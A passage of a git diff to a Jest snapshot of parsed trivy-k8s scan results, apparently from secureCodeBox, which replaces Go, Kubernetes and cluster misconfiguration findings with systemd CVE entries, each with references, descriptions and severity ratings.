"https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.20.0-alpha.2", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8565", - "installedVersion": "v0.19.2", - "packageName": "k8s.io/client-go", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8565", - "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", - "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", - "https://github.com/kubernetes/kubernetes/issues/95623", - "https://github.com/kubernetes/kubernetes/pull/95316", - "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", - "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", - "https://pkg.go.dev/vuln/GO-2021-0064", - "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8565", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8565", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/95623", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/95316", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0064", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "category": "Vulnerability", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0001", - ], - }, - "category": "Misconfiguration", - "description": "Disable anonymous requests to the API server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set '--anonymous-auth' to 'false'.", - "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0001", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0006", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0006", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, - "category": "Misconfiguration", - "description": "Verify kubelet's certificate before establishing connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", - "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "category": "Vulnerability", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0006", - }, - { - "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0010", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0010", - ], - }, - "category": "Misconfiguration", - "description": "Limit the rate at which the API server accepts requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", - "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0010", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV0012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/ksv0012", - ], - }, - "category": "Misconfiguration", - "description": "Always pull images.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", - "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv0012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0013", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0013", - ], - }, - "category": "Misconfiguration", - "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include SecurityContextDeny, unless PodSecurityPolicy is already in place.", - "name": "Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used(Ensure that the admission control plugin SecurityContextDeny is set if PodSecurityPolicy is not used)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0013", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0018", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0018", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0019", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0019", - ], - }, - "category": "Misconfiguration", - "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", - "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0019", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0020", - ], - }, - "category": "Misconfiguration", - "description": "Retain the logs for at least 30 days or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", - "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0020", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, ], "severity": "LOW", @@ -111789,231 +111581,97 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0021", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0021", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, - "category": "Misconfiguration", - "description": "Retain 10 or an appropriate number of old log files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", - "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing 